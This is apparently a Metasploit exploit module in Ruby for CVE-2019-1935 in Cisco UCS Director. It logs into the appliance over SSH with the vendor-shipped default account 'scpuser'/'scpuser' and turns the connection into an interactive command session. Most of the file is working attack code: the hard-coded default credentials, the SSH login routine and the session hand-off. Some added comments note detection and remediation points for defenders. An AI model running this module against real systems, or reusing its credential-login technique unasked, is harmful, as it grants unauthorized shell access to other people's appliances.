Path: blob/master/modules/exploits/linux/ssh/cisco_ucs_scpuser.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

# Checks a Cisco UCS Director appliance for the shipped default SSH credential
# pair tracked as CVE-2019-1935 (account 'scpuser', password 'scpuser') and, on
# a successful login, hands the SSH channel to the framework as a command
# session.
#
# Notes for defenders reading this module:
# * Exposure: the only precondition visible here is network reachability of the
#   appliance's SSH service (RPORT defaults to 22) together with an unchanged
#   default password.
# * Detection: the login uses the 'password' / 'keyboard-interactive' SSH
#   methods for the account named in USERNAME, so an interactive SSH
#   authentication for 'scpuser' is the event to alert on.
# * Remediation: the target string below reads "< 6.7.2.0", which suggests the
#   fix landed in that release -- confirm against the Cisco advisory listed in
#   'References'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  # Registers module metadata plus the basic and advanced datastore options.
  #
  # @param info [Hash] metadata overrides forwarded to update_info
  def initialize(info = {})
    metadata = {
      'Name' => 'Cisco UCS Director default scpuser password',
      'Description' => %q{
        This module abuses a known default password on Cisco UCS Director. The 'scpuser'
        has the password of 'scpuser', and allows an attacker to login to the virtual appliance
        via SSH.
        This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
        Note that Cisco also mentions in their advisory that their IMC Supervisor and
        UCS Director Express are also affected by these vulnerabilities, but this module
        was not tested with those products.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
      ],
      'References' => [
        [ 'CVE', '2019-1935' ],
        [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
        [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
        [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ]
      ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread'
      },
      # 'find' + 'cmd_interact': the session rides on the SSH connection that
      # do_login establishes (see handler(conn.lsock) in #exploit).
      'Payload' => {
        'Compat' => {
          'PayloadType' => 'cmd_interact',
          'ConnectionType' => 'find'
        }
      },
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Targets' => [
        [ 'Cisco UCS Director < 6.7.2.0', {} ],
      ],
      # The resulting session is declared as unprivileged.
      'Privileged' => false,
      'DefaultTarget' => 0,
      'DisclosureDate' => '2019-08-21',
      # NOTE(review): 'SideEffects' is declared empty, yet an SSH login attempt
      # would normally be recorded by the appliance's sshd; IOC_IN_LOGS may be
      # the more accurate declaration -- confirm against a test appliance.
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [REPEATABLE_SESSION],
        'SideEffects' => []
      }
    }
    super(update_info(info, metadata))

    # Both credential options default to the vendor-shipped value.
    basic_options = [
      Opt::RPORT(22),
      OptString.new('USERNAME', [true, 'Username to login with', 'scpuser']),
      OptString.new('PASSWORD', [true, 'Password to login with', 'scpuser']),
    ]
    register_options(basic_options, self.class)

    advanced_options = [
      OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
      OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
    ]
    register_advanced_options(advanced_options)
  end

  # @return the configured remote host (datastore 'RHOST')
  def rhost
    datastore['RHOST']
  end

  # @return the configured remote SSH port (datastore 'RPORT')
  def rport
    datastore['RPORT']
  end

  # Attempts one SSH login and wraps the session in a command stream.
  #
  # @param user [String] account name to authenticate as
  # @param pass [String] password to present
  # @return [Net::SSH::CommandStream, nil] the command stream on success; nil
  #   on any connection, negotiation or authentication failure
  def do_login(user, pass)
    ssh_options = ssh_client_defaults.merge(
      auth_methods: %w[password keyboard-interactive],
      port: rport,
      password: pass
    )
    ssh_options[:verbose] = :debug if datastore['SSH_DEBUG']

    session = nil
    begin
      # SSH_TIMEOUT is not a required option; presumably an unset value means
      # the negotiation runs without a time limit -- confirm.
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        session = Net::SSH.start(rhost, user, ssh_options)
      end
    rescue Rex::ConnectionError
      # Connection-level failures return without printing anything.
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return nil
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return nil
    rescue Net::SSH::AuthenticationFailed
      # Rejected credentials: the default password has been changed or the
      # account is not usable. Falls through to the nil return below.
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return nil
    end

    return nil unless session

    Net::SSH::CommandStream.new(session)
  end

  # Module entry point: tries the configured credentials once and, when the
  # login succeeds, passes the stream's local socket to the session handler.
  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    endpoint = "#{rhost}:#{rport}"

    print_status("#{endpoint} - Attempt to login to the Cisco appliance...")
    conn = do_login(user, pass)
    return unless conn

    # The working credential pair is echoed in clear text to the console.
    print_good("#{endpoint} - Login Successful (#{user}:#{pass})")
    handler(conn.lsock)
  end
end